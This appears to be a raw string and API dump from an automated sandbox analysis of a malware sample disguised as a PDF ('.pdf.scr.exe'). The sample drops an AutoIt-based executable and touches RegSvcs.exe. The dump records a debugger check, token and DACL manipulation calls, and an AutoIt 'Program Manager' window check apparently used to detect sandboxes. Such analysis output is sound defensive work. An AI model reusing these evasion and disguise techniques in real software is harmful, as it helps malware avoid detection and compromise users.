Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: ?tanh
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: atan2
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: floor
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: ldexp
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: _cabs
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: _hypot
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: frexp
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: _logb
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: _nextafter
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: ?tanhatanatan2sincostanceilfloorfabsmodfldexp_cabs_hypotfmodfrexp_y0_y1_yn_logb_nextafter
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: sinhcosh
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: conout$
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `rsds
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: d:\projects\winrar\sfx\build\sfxrar32\release\sfxrar.pdb
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .text$di
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .text$mn
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .text$x
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .text$xp+
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .text$yd
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: l.text$yd0
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .idata$5
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .idata$5x2
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .00cfg
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .crt$xca
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .crt$xcaa
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .crt$xcu
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: ,.crt$xcu
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .crt$xcz
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .crt$xia
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .crt$xiaa
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .crt$xiac
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .crt$xic
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .crt$xiz
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .crt$xpa
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .crt$xpx
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .crt$xpxa
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .crt$xpz
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .crt$xta
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .crt$xtz
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .gfids
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .rdata
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: {.rdata
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .rdata$r
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .rdata$sxdata
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .rdata$voltmd
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: d.rdata$voltmd
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .rdata$zzzdbg
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .rtc$iaa
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .rtc$izz
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .rtc$taa
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .rtc$tzz
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .xdata$x
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .didat$2
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .didat$3
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .didat$4
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .didat$6
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .didat$7
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .didat$7p
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .edata
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: 4.edata
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .idata$2
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: <.idata$2
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .idata$3
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .idata$4
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .idata$4l
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .idata$6
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .data
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .data$r
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .data$rs
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .bss0
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .didat$5
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .didat$5@
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .rsrc$01
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .rsrc$01pf
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .rsrc$02
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .rsrc$02"
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: showwindow
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: showwindow'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: getdlgitem
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: enablewindow
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: setwindowtextw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: setwindowtextwd
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: getparent
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: setwindowpos
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: setdlgitemtextw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: setdlgitemtextw~
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: getsystemmetrics
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: getclientrect
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: getwindowrect
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: getwindowlongw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: setwindowlongw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: setprocessdefaultlayout
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: getwindow
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: loadstringw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: loadstringw"
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: oemtocharbuffa
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: charupperw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: oemtocharbuffa<charupperw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: defwindowprocw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: defwindowprocwm
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: registerclassexw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: createwindowexw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: registerclassexwncreatewindowexw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: iswindow
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: destroywindow
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: updatewindow
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: mapwindowpoints
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: copyrect
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: mapwindowpointsucopyrect
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: loadcursorw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: loadcursorw|
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: sendmessagew
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: sendmessagew!
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: getdc
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: getdce
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: releasedc
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: messageboxw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: findwindowexw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: getclassnamew
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: copyimage
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: getclassnamewtcopyimage5
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: wvsprintfw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: wvsprintfw]
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: getmessagew
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: translatemessage
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: dispatchmessagew
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: dispatchmessagew3
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: peekmessagew
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: peekmessagew6
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: postmessagew
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: postmessagew&
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: waitforinputidle
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: iswindowvisible
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: dialogboxparamw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: enddialog
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: enddialog*
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: getdlgitemtextw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: getdlgitemtextws
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: senddlgitemmessagew
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: setfocus
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: setforegroundwindow
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: setforegroundwindow{
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: getsyscolor
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: loadbitmapw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: loadiconw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: destroyicon
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: isdialogmessagew
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: createcompatiblebitmap
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: createcompatibledc
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: isdialogmessagew/createcompatiblebitmap0createcompatibledc
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: deletedc
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: deleteobject
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: getdevicecaps
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: getdevicecapsw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: selectobject
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: stretchblt
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: createdibsection
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00371A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 2_2_00371A91
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00313312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 2_2_00313312
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0037EBB3 mouse_event, 2_2_0037EBB3
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00371EF3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 2_2_00371EF3
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_003713F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 2_2_003713F2
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.0000000007382000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000000.358747295.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: RegSvcs.exe, 00000003.00000002.580107208.00000000038EE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.580107208.0000000003872000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.580107208.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerH
Source: itugx.exe, 00000002.00000003.397098361.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.389382633.0000000000E36000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.409778317.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager&
Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003BD9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.586667731.00000000075DC000.00000004.00000010.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.580107208.00000000038EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: itugx.exe Binary or memory string: Shell_TrayWnd
Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager8W
Source: itugx.exe, 00000005.00000003.451315387.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.452100532.0000000001510000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451193951.00000000014F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerm,
Source: itugx.exe, 0000001C.00000002.577313681.0000000001338000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managera
Source: itugx.exe, 00000010.00000003.440840027.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.439624886.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.467653750.00000000012A5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If WinGetText("Program Manager") = "0" Then
Source: itugx.exe, 00000005.00000003.451151702.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.462582507.00000000013BF000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.505411546.00000000012AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: inGetText("Program Manager") = "0" Then
Source: rnnsh.xls.0.dr Binary or memory string: If WinGetText("Program Manager") = "0" Then
Source: RegSvcs.exe, 00000003.00000002.580107208.00000000038EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager\2
Source: itugx.exe, 00000017.00000003.535781769.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.534401259.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.539266088.0000000000CD3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager*;
Source: itugx.exe, 00000005.00000003.410793804.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If WinGetText("Program Manager") = "0" Then$
Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003802000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerD$Fp
